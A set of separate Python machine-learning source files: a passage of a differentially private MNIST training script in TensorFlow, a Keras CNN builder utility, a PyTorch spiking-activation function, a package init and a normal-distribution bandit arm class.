tf.flags.DEFINE_string("accountant_type", "Moments", "Moments, Amortized.")
# Flags that control privacy spending during training.
tf.flags.DEFINE_float("eps", 1.0,
"Start privacy spending for one epoch of training, "
"used if accountant_type is Amortized.")
tf.flags.DEFINE_float("end_eps", 1.0,
"End privacy spending for one epoch of training, "
"used if accountant_type is Amortized.")
tf.flags.DEFINE_float("eps_saturate_epochs", 0,
"Stop varying epsilon after eps_saturate_epochs. Set to "
"0 for constant eps of --eps. "
"Used if accountant_type is Amortized.")
tf.flags.DEFINE_float("delta", 1e-5,
"Privacy spending for training. Constant through "
"training, used if accountant_type is Amortized.")
tf.flags.DEFINE_float("sigma", 4.0,
"Noise sigma, used only if accountant_type is Moments")
# Flags that control privacy spending for the pca projection
# (only used if --projection_dimensions > 0).
tf.flags.DEFINE_float("pca_eps", 0.5,
"Privacy spending for PCA, used if accountant_type is "
"Amortized.")
tf.flags.DEFINE_float("pca_delta", 0.005,
"Privacy spending for PCA, used if accountant_type is "
"Amortized.")
tf.flags.DEFINE_float("pca_sigma", 7.0,
"Noise sigma for PCA, used if accountant_type is Moments")
tf.flags.DEFINE_string("target_eps", "0.125,0.25,0.5,1,2,4,8",
"Log the privacy loss for the target epsilon's. Only "
"used when accountant_type is Moments.")
tf.flags.DEFINE_float("target_delta", 1e-5,
"Maximum delta for --terminate_based_on_privacy.")
tf.flags.DEFINE_bool("terminate_based_on_privacy", False,
"Stop training if privacy spent exceeds "
"(max(--target_eps), --target_delta), even "
"if --num_training_steps have not yet been completed.")
tf.flags.DEFINE_string("save_path", "/tmp/mnist_dir",
"Directory for saving model outputs.")
FLAGS = tf.flags.FLAGS
NUM_TRAINING_IMAGES = 60000
NUM_TESTING_IMAGES = 10000
IMAGE_SIZE = 28
def MnistInput(mnist_data_file, batch_size, randomize):
"""Create operations to read the MNIST input file.
Args:
mnist_data_file: Path of a file containing the MNIST images to process.
batch_size: size of the mini batches to generate.
randomize: If true, randomize the dataset.
Returns:
images: A tensor with the formatted image data. shape [batch_size, 28*28]
labels: A tensor with the labels for each image. shape [batch_size]
"""
file_queue = tf.train.string_input_producer([mnist_data_file])
reader = tf.TFRecordReader()
_, value = reader.read(file_queue)
example = tf.parse_single_example(
value,
features={"image/encoded": tf.FixedLenFeature(shape=(), dtype=tf.string),
"image/class/label": tf.FixedLenFeature([1], tf.int64)})
image = tf.cast(tf.image.decode_png(example["image/encoded"], channels=1),
tf.float32)
image = tf.reshape(image, [IMAGE_SIZE * IMAGE_SIZE])
image /= 255
label = tf.cast(example["image/class/label"], dtype=tf.int32)
label = tf.reshape(label, [])
if randomize:
images, labels = tf.train.shuffle_batch(
[image, label], batch_size=batch_size,
capacity=(batch_size * 100),
min_after_dequeue=(batch_size * 10))
else:
images, labels = tf.train.batch([image, label], batch_size=batch_size)
return images, labels
def Eval(mnist_data_file, network_parameters, num_testing_images,
randomize, load_path, save_mistakes=False):
"""Evaluate MNIST for a number of steps.
Args:
mnist_data_file: Path of a file containing the MNIST images to process.
network_parameters: parameters for defining and training the network.
num_testing_images: the number of images we will evaluate on.
    randomize: if true, randomize the order of the testing images; otherwise,
      read them sequentially.
load_path: path where to load trained parameters from.
save_mistakes: save the mistakes if True.
Returns:
The evaluation accuracy as a float.
"""
batch_size = 100
# Like for training, we need a session for executing the TensorFlow graph.
with tf.Graph().as_default(), tf.Session() as sess:
# Create the basic Mnist model.
images, labels = MnistInput(mnist_data_file, batch_size, randomize)
logits, _, _ = utils.BuildNetwork(images, network_parameters)
softmax = tf.nn.softmax(logits)
# Load the variables.
ckpt_state = tf.train.get_checkpoint_state(load_path)
if not (ckpt_state and ckpt_state.model_checkpoint_path):
raise ValueError("No model checkpoint to eval at %s\n" % load_path)
saver = tf.train.Saver()
saver.restore(sess, ckpt_state.model_checkpoint_path)
coord = tf.train.Coordinator()
_ = tf.train.start_queue_runners(sess=sess, coord=coord)
total_examples = 0
correct_predictions = 0
image_index = 0
mistakes = []
for _ in xrange((num_testing_images + batch_size - 1) // batch_size):
predictions, label_values = sess.run([softmax, labels])
# Count how many were predicted correctly.
for prediction, label_value in zip(predictions, label_values):
total_examples += 1
if np.argmax(prediction) == label_value:
correct_predictions += 1
elif save_mistakes:
mistakes.append({"index": image_index,
"label": label_value,
"pred": np.argmax(prediction)})
image_index += 1
return (correct_predictions / total_examples,
mistakes if save_mistakes else None)
def Train(mnist_train_file, mnist_test_file, network_parameters, num_steps,
save_path, eval_steps=0):
"""Train MNIST for a number of steps.
Args:
mnist_train_file: path of MNIST train data file.
mnist_test_file: path of MNIST test data file.
network_parameters: parameters for defining and training the network.
num_steps: number of steps to run. Here steps = lots
save_path: path where to save trained parameters.
eval_steps: evaluate the model every eval_steps.
Returns:
the result after the final training step.
Raises:
ValueError: if the accountant_type is not supported.
"""
batch_size = FLAGS.batch_size
params = {"accountant_type": FLAGS.accountant_type,
"task_id": 0,
"batch_size": FLAGS.batch_size,
"projection_dimensions": FLAGS.projection_dimensions,
"default_gradient_l2norm_bound":
network_parameters.default_gradient_l2norm_bound,
"num_hidden_layers": FLAGS.num_hidden_layers,
"hidden_layer_num_units": FLAGS.hidden_layer_num_units,
"num_examples": NUM_TRAINING_IMAGES,
"learning_rate": FLAGS.lr,
"end_learning_rate": FLAGS.end_lr,
"learning_rate_saturate_epochs": FLAGS.lr_saturate_epochs
}
# Log different privacy parameters dependent on the accountant type.
if FLAGS.accountant_type == "Amortized":
params.update({"flag_eps": FLAGS.eps,
"flag_delta": FLAGS.delta,
"flag_pca_eps": FLAGS.pca_eps,
"flag_pca_delta": FLAGS.pca_delta,
})
elif FLAGS.accountant_type == "Moments":
params.update({"sigma": FLAGS.sigma,
"pca_sigma": FLAGS.pca_sigma,
})
with tf.Graph().as_default(), tf.Session() as sess, tf.device('/cpu:0'):
# Create the basic Mnist model.
images, labels = MnistInput(mnist_train_file, batch_size, FLAGS.randomize)
logits, projection, training_params = utils.BuildNetwork(
images, network_parameters)
cost = tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=tf.one_hot(labels, 10))
# The actual cost is the average across the examples.
cost = tf.reduce_sum(cost, [0]) / batch_size
if FLAGS.accountant_type == "Amortized":
priv_accountant = accountant.AmortizedAccountant(NUM_TRAINING_IMAGES)
sigma = None
pca_sigma = None
with_privacy = FLAGS.eps > 0
elif FLAGS.accountant_type == "Moments":
priv_accountant = accountant.GaussianMomentsAccountant(
NUM_TRAINING_IMAGES)
sigma = FLAGS.sigma
pca_sigma = FLAGS.pca_sigma
with_privacy = FLAGS.sigma > 0
else:
raise ValueError("Undefined accountant type, needs to be "
"Amortized or Moments, but got %s" % FLAGS.accountant)
# Note: Here and below, we scale down the l2norm_bound by
# batch_size. This is because per_example_gradients computes the
# gradient of the minibatch loss with respect to each individual
# example, and the minibatch loss (for our model) is the *average*
# loss over examples in the minibatch. Hence, the scale of the
# per-example gradients goes like 1 / batch_size.
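    # For example, with the default --default_gradient_l2norm_bound of 4.0 and
    # --batch_size of 600, each per-example gradient is clipped to an L2 norm of
    # 4.0 / 600 ≈ 0.0067 before noise is added.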
gaussian_sanitizer = sanitizer.AmortizedGaussianSanitizer(
priv_accountant,
[network_parameters.default_gradient_l2norm_bound / batch_size, True])
for var in training_params:
if "gradient_l2norm_bound" in training_params[var]:
l2bound = training_params[var]["gradient_l2norm_bound"] / batch_size
gaussian_sanitizer.set_option(var,
sanitizer.ClipOption(l2bound, True))
lr = tf.placeholder(tf.float32)
eps = tf.placeholder(tf.float32)
delta = tf.placeholder(tf.float32)
init_ops = []
if network_parameters.projection_type == "PCA":
with tf.variable_scope("pca"):
# Compute differentially private PCA.
all_data, _ = MnistInput(mnist_train_file, NUM_TRAINING_IMAGES, False)
pca_projection = dp_pca.ComputeDPPrincipalProjection(
all_data, network_parameters.projection_dimensions,
gaussian_sanitizer, [FLAGS.pca_eps, FLAGS.pca_delta], pca_sigma)
assign_pca_proj = tf.assign(projection, pca_projection)
init_ops.append(assign_pca_proj)
# Add global_step
global_step = tf.Variable(0, dtype=tf.int32, trainable=False,
name="global_step")
if with_privacy:
gd_op = dp_optimizer.DPGradientDescentOptimizer(
lr,
[eps, delta],
gaussian_sanitizer,
sigma=sigma,
batches_per_lot=FLAGS.batches_per_lot).minimize(
cost, global_step=global_step)
else:
gd_op = tf.train.GradientDescentOptimizer(lr).minimize(cost)
saver = tf.train.Saver()
coord = tf.train.Coordinator()
_ = tf.train.start_queue_runners(sess=sess, coord=coord)
    # We need to maintain the initialization sequence.
for v in tf.trainable_variables():
sess.run(tf.variables_initializer([v]))
sess.run(tf.global_variables_initializer())
sess.run(init_ops)
results = []
start_time = time.time()
prev_time = start_time
filename = "results-0.json"
log_path = os.path.join(save_path, filename)
target_eps = [float(s) for s in FLAGS.target_eps.split(",")]
if FLAGS.accountant_type == "Amortized":
# Only matters if --terminate_based_on_privacy is true.
target_eps = [max(target_eps)]
max_target_eps = max(target_eps)
lot_size = FLAGS.batches_per_lot * FLAGS.batch_size
lots_per_epoch = NUM_TRAINING_IMAGES / lot_size
for step in xrange(num_steps):
epoch = step / lots_per_epoch
curr_lr = utils.VaryRate(FLAGS.lr, FLAGS.end_lr,
FLAGS.lr_saturate_epochs, epoch)
curr_eps = utils.VaryRate(FLAGS.eps, FLAGS.end_eps,
FLAGS.eps_saturate_epochs, epoch)
for _ in xrange(FLAGS.batches_per_lot):
_ = sess.run(
[gd_op], feed_dict={lr: curr_lr, eps: curr_eps, delta: FLAGS.delta})
sys.stderr.write("step: %d\n" % step)
# See if we should stop training due to exceeded privacy budget:
should_terminate = False
terminate_spent_eps_delta = None
if with_privacy and FLAGS.terminate_based_on_privacy:
terminate_spent_eps_delta = priv_accountant.get_privacy_spent(
sess, target_eps=[max_target_eps])[0]
# For the Moments accountant, we should always have
# spent_eps == max_target_eps.
if (terminate_spent_eps_delta.spent_delta > FLAGS.target_delta or
terminate_spent_eps_delta.spent_eps > max_target_eps):
should_terminate = True
if (eval_steps > 0 and (step + 1) % eval_steps == 0) or should_terminate:
if with_privacy:
spent_eps_deltas = priv_accountant.get_privacy_spent(
sess, target_eps=target_eps)
else:
spent_eps_deltas = [accountant.EpsDelta(0, 0)]
for spent_eps, spent_delta in spent_eps_deltas:
sys.stderr.write("spent privacy: eps %.4f delta %.5g\n" % (
spent_eps, spent_delta))
saver.save(sess, save_path=save_path + "/ckpt")
train_accuracy, _ = Eval(mnist_train_file, network_parameters,
num_testing_images=NUM_TESTING_IMAGES,
randomize=True, load_path=save_path)
sys.stderr.write("train_accuracy: %.2f\n" % train_accuracy)
test_accuracy, mistakes = Eval(mnist_test_file, network_parameters,
num_testing_images=NUM_TESTING_IMAGES,
randomize=False, load_path=save_path,
save_mistakes=FLAGS.save_mistakes)
sys.stderr.write("eval_accuracy: %.2f\n" % test_accuracy)
curr_time = time.time()
elapsed_time = curr_time - prev_time
prev_time = curr_time
results.append({"step": step + 1, # Number of lots trained so far.
"elapsed_secs": elapsed_time,
"spent_eps_deltas": spent_eps_deltas,
"train_accuracy": train_accuracy,
"test_accuracy": test_accuracy,
"mistakes": mistakes})
loginfo = {"elapsed_secs": curr_time - start_time,
"spent_eps_deltas": spent_eps_deltas,
"train_accuracy": train_accuracy,
"test_accuracy": test_accuracy,
"num_training_steps": step + 1, # Steps so far.
"mistakes": mistakes,
"result_series": results}
loginfo.update(params)
if log_path:
with tf.gfile.Open(log_path, "w") as f:
json.dump(loginfo, f, indent=2)
f.write("\n")
f.close()
if should_terminate:
break
def main(_):
network_parameters = utils.NetworkParameters()
# If the ASCII proto isn't specified, then construct a config protobuf based
# on 3 flags.
network_parameters.input_size = IMAGE_SIZE ** 2
network_parameters.default_gradient_l2norm_bound = (
FLAGS.default_gradient_l2norm_bound)
if FLAGS.projection_dimensions > 0 and FLAGS.num_conv_layers > 0:
raise ValueError("Currently you can't do PCA and have convolutions"
"at the same time. Pick one")
# could add support for PCA after convolutions.
# Currently BuildNetwork can build the network with conv followed by
# projection, but the PCA training works on data, rather than data run
# through a few layers. Will need to init the convs before running the
# PCA, and need to change the PCA subroutine to take a network and perhaps
# allow for batched inputs, to handle larger datasets.
if FLAGS.num_conv_layers > 0:
conv = utils.ConvParameters()
conv.name = "conv1"
conv.in_channels = 1
conv.out_channels = 128
conv.num_outputs = 128 * 14 * 14
network_parameters.conv_parameters.append(conv)
# defaults for the rest: 5x5,stride 1, relu, maxpool 2x2,stride 2.
# insize 28x28, bias, stddev 0.1, non-trainable.
if FLAGS.num_conv_layers > 1:
      conv = utils.ConvParameters()
conv.name = "conv2"
conv.in_channels = 128
conv.out_channels = 128
conv.num_outputs = 128 * 7 * 7
conv.in_size = 14
# defaults for the rest: 5x5,stride 1, relu, maxpool 2x2,stride 2.
# bias, stddev 0.1, non-trainable.
network_parameters.conv_parameters.append(conv)
if FLAGS.num_conv_layers > 2:
raise ValueError("Currently --num_conv_layers must be 0,1 or 2."
"Manually create a network_parameters proto for more.")
if FLAGS.projection_dimensions > 0:
network_parameters.projection_type = "PCA"
network_parameters.projection_dimensions = FLAGS.projection_dimensions
for i in xrange(FLAGS.num_hidden_layers):
hidden = utils.LayerParameters()
hidden.name = "hidden%d" % i
hidden.num_units = FLAGS.hidden_layer_num_units
hidden.relu = True
hidden.with_bias = False
hidden.trainable = not FLAGS.freeze_bottom_layers
network_parameters.layer_parameters.append(hidden)
logits = utils.LayerParameters()
logits.name = "logits"
logits.num_units = 10
logits.relu = False
logits.with_bias = False
network_parameters.layer_parameters.append(logits)
Train(FLAGS.training_data_path,
FLAGS.eval_data_path,
network_parameters,
FLAGS.num_training_steps,
FLAGS.save_path,
eval_steps=FLAGS.eval_steps)
if __name__ == "__main__":
tf.app.run()
|
from chia.instrumentation.observers.observer import Observer
from chia.instrumentation.observers.observer_factory import ObserverFactory
__all__ = ["Observer", "ObserverFactory"]
|
import tensorflow as tf
from tensorflow.keras.metrics import BinaryAccuracy, AUC, FalsePositives, FalseNegatives
from tensorflow.keras.losses import BinaryCrossentropy
from tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping
from tensorflow.keras.layers import Conv2D, MaxPooling2D, AveragePooling2D, Flatten, Dense, Dropout, BatchNormalization, InputLayer, LeakyReLU
# from tensorflow.keras.layers import Activation, Reshape
from tensorflow.keras.models import Sequential
from tensorflow.keras.models import Model  # used by get_activations()
from data_util import calc_class_weight, calc_sample_weight
TF_RANDOM_SEED = 486
tf.random.set_seed(TF_RANDOM_SEED)
print("[cnn_util] Tensorflow Random Seed set to {}".format(TF_RANDOM_SEED))
class CNN_Builder:
DROP_OUT_RANDOM_SEED = 42
@classmethod
def build_Conv2D(cls, config):
"""
e.g. config = "3-3x3-1x1-relu-valid" means
Conv2D(filters=3, kernel_size=(3, 3), strides=(1, 1), activation='relu', padding="valid")
"""
param_list = config.split("-")
if len(param_list) != 5:
raise ValueError("Exact 5 parameters to config. Got config={}".format(config))
# unpack the param list into specific variables
filters, kernel_size, strides, activation, padding = param_list
filters = int(filters)
kernel_size = tuple(int(dim) for dim in kernel_size.split("x"))
if len(kernel_size) == 1:
kernel_size = kernel_size[0]
strides = tuple(int(stride) for stride in strides.split("x"))
if len(strides) == 1:
strides = strides[0]
if activation == "LeakyReLU":
activation = lambda x: LeakyReLU()(x)
return Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, activation=activation, padding=padding)
@classmethod
def build_Dense(cls, config):
"""
e.g. config = "16-sigmoid" means Dense(units=16, activation='sigmoid')
"""
param_list = config.split("-")
if len(param_list) != 2:
raise ValueError("Exact 2 parameters to config. Got config={}".format(config))
# unpack the param list into specific variables
units, activation = param_list
units = int(units)
if activation == "LeakyReLU":
activation = lambda x: LeakyReLU()(x)
if activation == "None":
activation = None
return Dense(units=units, activation=activation)
@classmethod
def build_Flatten(cls):
return Flatten()
@classmethod
def build_BatchNormalization(cls):
return BatchNormalization()
@classmethod
def _build_Pooling2D(cls, config, class_name):
param_list = config.split("-")
if len(param_list) != 3:
raise ValueError("Exact 3 parameters to config. Got config={}".format(config))
# unpack the param list into specific variables
pool_size, strides, padding = param_list
pool_size = tuple(int(dim) for dim in pool_size.split("x"))
if len(pool_size) == 1:
pool_size = pool_size[0]
strides = tuple(int(stride) for stride in strides.split("x"))
if len(strides) == 1:
strides = strides[0]
if class_name == "MaxPooling2D":
return MaxPooling2D(pool_size=pool_size, strides=strides, padding=padding)
elif class_name == "AveragePooling2D":
return AveragePooling2D(pool_size=pool_size, strides=strides, padding=padding)
else:
raise ValueError("cannot recognize Pooling2D class name. Got {}".format(class_name))
@classmethod
def build_MaxPooling2D(cls, config):
"""
e.g. config = "3x3-2x2-valid" means MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding="valid")
Note that `pool_size` usually is a tuple like (3, 3), denoting a 3x3 window.
If only one integer is specified, the same window length will be used for both dimensions.
"""
return cls._build_Pooling2D(config, "MaxPooling2D")
@classmethod
def build_AveragePooling2D(cls, config):
"""
e.g. config = "3x3-2x2-valid" means AveragePooling2D(pool_size=(3, 3), strides=(2, 2), padding="valid")
Note that `pool_size` usually is a tuple like (3, 3), denoting a 3x3 window.
If only one integer is specified, the same window length will be used for both dimensions.
"""
return cls._build_Pooling2D(config, "AveragePooling2D")
@classmethod
def build_InputLayer(cls, shape):
"""
e.g. shape = "9x2001x1" means InputLayer(input_shape=(9, 2001, 1))
"""
input_shape = tuple(int(dim) for dim in shape.split("x"))
return InputLayer(input_shape=input_shape)
@classmethod
def build_Dropout(cls, rate):
        rate = float(rate)
return Dropout(rate=rate, seed=cls.DROP_OUT_RANDOM_SEED)
@classmethod
def build_Sequential(cls, model_config):
"""
e.g. model_config = ("InputLayer:9x2001x1", "Conv2D:3-3-1-relu-valid", "Dense:1-sigmoid") will lead to a Sequential model of
Sequential([
InputLayer(input_shape=(9, 2001, 1)),
Conv2D(filters=3, kernel_size=3, strides=1, activation="relu"),
Dense(units=1, activation='sigmoid')
])
"""
model = Sequential([])
for layer_config in model_config:
layer_name, *config = layer_config.split(":")
if config:
layer = getattr(cls, "build_" + layer_name)(config[0])
else:
layer = getattr(cls, "build_" + layer_name)()
model.add(layer)
return model
def compile_model(model, metric_names, optimizer="adam", build=True):
loss = BinaryCrossentropy(name="loss")
metrics = []
if "acc" in metric_names:
metrics.append(BinaryAccuracy(name="acc"))
if "auprc" in metric_names:
metrics.append(AUC(curve="PR", name="auprc"))
if "auroc" in metric_names:
metrics.append(AUC(curve="ROC", name="auroc"))
if "fp" in metric_names:
metrics.append(FalsePositives(name="fp"))
if "fn" in metric_names:
metrics.append(FalseNegatives(name="fn"))
model.compile(loss=loss, metrics=metrics, optimizer=optimizer)
if build:
# See https://stackoverflow.com/a/59356545 for the usage of build() function
model.build()
def fit_model(model, x_train, y_train, x_test, y_test, batch_size, epochs, use_class_weight=False, use_sample_weight=False, use_reduce_rl=False, use_early_stopping=False, verbose=1):
train_class_weight = calc_class_weight(y_train) if use_class_weight else None
test_sample_weight = calc_sample_weight(y_test) if use_sample_weight else None
if train_class_weight is not None:
print('[cnn_util] using class weight {} for training'.format(train_class_weight))
if test_sample_weight is not None:
print('[cnn_util] using sample weight for testing')
if x_test is None and y_test is None:
validation_data = None
callbacks = None
else:
validation_data = (x_test, y_test, test_sample_weight)
callbacks = []
if use_reduce_rl:
callbacks.append(ReduceLROnPlateau(monitor="val_loss", factor=0.5, patience=3))
if use_early_stopping:
callbacks.append(EarlyStopping(monitor="val_loss", patience=6, restore_best_weights=True))
if not callbacks:
callbacks = None
history = model.fit(x=x_train, y=y_train, class_weight=train_class_weight,
validation_data=validation_data,
batch_size=batch_size, epochs=epochs, callbacks=callbacks, verbose=verbose)
return history
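# Illustrative end-to-end sketch (assumed input shape, layer configs and
# hyperparameters; not part of the original training pipeline):
#
#   model = CNN_Builder.build_Sequential((
#       "InputLayer:9x2001x1",
#       "Conv2D:8-3x3-1x1-relu-valid",
#       "MaxPooling2D:2x2-2x2-valid",
#       "Flatten",
#       "Dense:1-sigmoid",
#   ))
#   compile_model(model, metric_names=["acc", "auprc"], optimizer="adam")
#   history = fit_model(model, x_train, y_train, x_test, y_test,
#                       batch_size=32, epochs=10, use_early_stopping=True)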
def get_activations(model, x, batch_size=1000):
# get the activations from the last but one layer
activation_model = Model(inputs=model.inputs, outputs=model.layers[-2].output)
with tf.device('/gpu:1'):
activations = activation_model.predict(x, batch_size=batch_size)
return activations |
import torch
class SpikingActivation(torch.autograd.Function):
"""
Function for converting an arbitrary activation function to a spiking equivalent.
Notes
-----
We would not recommend calling this directly, use
`pytorch_spiking.SpikingActivation` instead.
"""
@staticmethod
def forward(
ctx,
inputs,
activation,
dt=0.001,
initial_state=None,
spiking_aware_training=True,
return_sequences=False,
training=False,
):
"""
Forward pass of SpikingActivation function.
Parameters
----------
inputs : ``torch.Tensor``
Array of input values with shape ``(batch_size, n_steps, n_neurons)``.
activation : callable
Activation function to be converted to spiking equivalent.
dt : float
Length of time (in seconds) represented by one time step.
initial_state : ``torch.Tensor``
Initial spiking voltage state (should be an array with shape
``(batch_size, n_neurons)``, with values between 0 and 1). Will use a
uniform distribution if none is specified.
spiking_aware_training : bool
If True (default), use the spiking activation function
for the forward pass and the base activation function for the backward pass.
If False, use the base activation function for the forward and
backward pass during training.
return_sequences : bool
Whether to return the last output in the output sequence (default), or the
full sequence.
training : bool
Whether this function should be executed in training or evaluation mode
(this only matters if ``spiking_aware_training=False``).
"""
ctx.activation = activation
ctx.return_sequences = return_sequences
ctx.save_for_backward(inputs)
if training and not spiking_aware_training:
output = activation(inputs if return_sequences else inputs[:, -1])
return output
if initial_state is None:
initial_state = torch.rand(
inputs.shape[0], inputs.shape[2], dtype=inputs.dtype
)
# match inputs to initial state dtype if one was passed in
inputs = inputs.type(initial_state.dtype)
voltage = initial_state
all_spikes = []
rates = activation(inputs) * dt
for i in range(inputs.shape[1]):
voltage += rates[:, i]
n_spikes = torch.floor(voltage)
voltage -= n_spikes
if return_sequences:
all_spikes.append(n_spikes)
if return_sequences:
output = torch.stack(all_spikes, dim=1)
else:
output = n_spikes
output /= dt
return output
@staticmethod
def backward(ctx, grad_output):
"""Backward pass of SpikingActivation function."""
# TODO: is there a way to reuse the forward pass activations computed in
# `forward`? the below results in an infinite loop
# inputs, rates = ctx.saved_tensors
# return torch.autograd.grad(rates, inputs, grad_outputs=grad_output)
inputs = ctx.saved_tensors[0]
with torch.enable_grad():
output = ctx.activation(inputs if ctx.return_sequences else inputs[:, -1])
return (
torch.autograd.grad(output, inputs, grad_outputs=grad_output)
+ (None,) * 7
)
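# Illustrative usage sketch (hypothetical tensor shapes, torch.relu as the base
# activation to convert):
#
#   x = torch.rand(32, 100, 64)                      # (batch_size, n_steps, n_neurons)
#   spikes = SpikingActivation.apply(x, torch.relu)  # last-step spike rates, shape (32, 64)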
spiking_activation = SpikingActivation.apply |
import random
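# A single "arm" for a multi-armed bandit simulation: each draw() returns a
# reward sampled from a normal distribution with mean mu and std deviation sigma.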
class NormalArm():
def __init__(self, mu, sigma):
self.mu = mu
self.sigma = sigma
def draw(self):
return random.gauss(self.mu, self.sigma)
|